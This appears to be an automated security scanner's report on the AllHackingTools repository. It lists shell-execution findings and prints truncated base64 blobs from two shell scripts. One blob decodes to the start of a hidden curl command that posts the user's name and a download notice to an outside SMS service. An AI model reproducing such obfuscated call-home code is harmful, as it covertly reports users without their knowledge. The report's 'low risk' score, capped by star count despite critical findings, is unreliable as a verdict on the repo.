live · scanning repos
Scanrepo
github.com
github.com / mishakorzik

mishakorzik/AllHackingTools

Shell·262 files·commit def693c·scanned 2h ago·cached ✓
25/100
LOW RISK
Minor findings consistent with the project type. Nothing reachable from install hooks.

score capped at 25 — 6,230 stars — findings likely legitimate code patterns

verdict accurate?
Research / educational context
threat-state: lowlive

FINDINGS ░▒▓

warningPython subprocess / os.system usageos.system() or subprocess with shell=True / suspicious commands can execute arbitrary shell commands. Plain pip/package installs are usually benign.src/BannerType.py

os.system("clear")
os.system("cd && cd AllHackingTools && clear && bash Logo.sh")
+4
warningPython subprocess / os.system usageos.system() or subprocess with shell=True / suspicious commands can execute arbitrary shell commands. Plain pip/package installs are usually benign.src/CheckFolder.py
                                if os.path.exists(path9):
                                    os.system("cd && cd AllHackingTools && cd src && bash starterUp.sh")
                                else:...
+4
warningPython subprocess / os.system usageos.system() or subprocess with shell=True / suspicious commands can execute arbitrary shell commands. Plain pip/package installs are usually benign.src/CheckVersion.py
	print ('\n' + R + '[!]' + C + ' Keyboard Interrupt.' + W)
	os.system("cd && bash AllHackingTools/.check/ConfigurationOptions.sh")

+4
criticalObfuscated payload executed in shellA shell script decodes an obfuscated blob (base64) and pipes it into an interpreter, hiding the real command from casual review..check/ServerConfig.sh
echo Y3VybCAtWCBQT1NUIGh0dHBzOi8vdGV4dGJlbHQuY29tL3RleHQgXAogICAgIC0tZGF0YS11cmxlbmNvZGUgcGhvbmU9JyszODA2NjkzNDE0ODknIFwKICAgICAtLWRhdGEtdXJsZW5jb2RlIG1lc3NhZ2U9JyR1c2VyIERvd25sb2FkINCQbGzQndCwa9GWbmf...
+8
criticalObfuscated payload executed in shellA shell script decodes an obfuscated blob (base64) and pipes it into an interpreter, hiding the real command from casual review.Files/CodedModules.sh
echo Zz0iXDAzM1sxOzMybSIKcj0iXDAzM1sxOzMxbSIKYj0iXDAzM1sxOzM0bSIKdz0iXDAzM1swbSIKCmNkCmNkCmNkIEFsbEhhY2tpbmdUb29scwplY2hvIC1lICRiIj4iJHciIHVwZ3JhZGluZyBwYWNrZWdlczogIiRnInBrZyAmIGFwdCIkdwpwa2cgdXBncmF...
+8
infoSuspicious files are not reachable from entry pointsFlagged files exist but are not imported by any entry point. They may be dead code, tests, or attack payloads triggered by another mechanism.+2
warningExtremely long lines (>1000 chars)Very long lines in source files (not minified bundles) can hide malicious code.Files/CodedModules.sh+4
warningHigh-entropy string literalsFound 5 long strings with high Shannon entropy. This is common in obfuscated payloads that hide URLs, keys, or bytecode.src/BannerType.py+3
warningHigh-entropy string literalsFound 4 long strings with high Shannon entropy. This is common in obfuscated payloads that hide URLs, keys, or bytecode.src/InstallMenu.py+3
warningHigh-entropy string literalsFound 5 long strings with high Shannon entropy. This is common in obfuscated payloads that hide URLs, keys, or bytecode.src/TerminalBanner.py+3

Scores are heuristics. A “safe” verdict means no known-malicious patterns were found — clever malware can look boring. Wrong verdict? Flag it above; confirmed false positives become regression tests.

185 files scanned @ def693c | 9/25/2026 | heuristic scan — always review manually

risk by category
code execution25
network & exfiltration0
file system access0
obfuscation15
supply chain0
owasp / injection0
telemetry
files 185/262rules hit 10engine v6commit def693c

github

mishakorzik/AllHackingTools

All-in-One Hacking Tools For Hackers! And more hacking tools! For termux.

Shell
6230
1020
1964d
262 files
185 scanned(71%)
def693c

architecture░▒▓

entry (0) flagged (59) pkg (15)
82 nodes · 213 edgesscroll to zoom · click node to jump to finding